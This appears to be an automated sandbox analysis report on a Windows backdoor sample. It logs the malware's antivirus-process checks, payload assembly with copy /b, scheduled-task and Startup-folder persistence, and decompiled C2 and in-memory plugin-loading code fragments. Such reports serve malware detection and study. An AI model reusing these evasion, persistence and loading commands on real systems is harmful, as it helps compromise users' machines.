              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeReversingLabs: Detection: 21%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.batJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\RJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\RJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exitJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /FJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /FJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeStatic file information: File size 10515536 > 1048576
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
              Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
              Source: Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs.Net Code: Memory
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs.Net Code: Memory
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs.Net Code: Memory
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs.Net Code: Memory
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00445FC8
              Source: Northeast.0.drStatic PE information: real checksum: 0xf6bf3 should be: 0x42226
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004902D8 push cs; retn 0048h11_2_00490318
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00460DE6 push ecx; ret 11_2_00460DF9
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0045DC7C push AA0049CFh; iretd 11_2_0045DC87

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifJump to dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifFile created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\NortheastJump to dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifFile created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\NortheastJump to dropped file

              Boot Survival

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.urlJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.urlJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_004D26DD
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0045FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_0045FC7C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
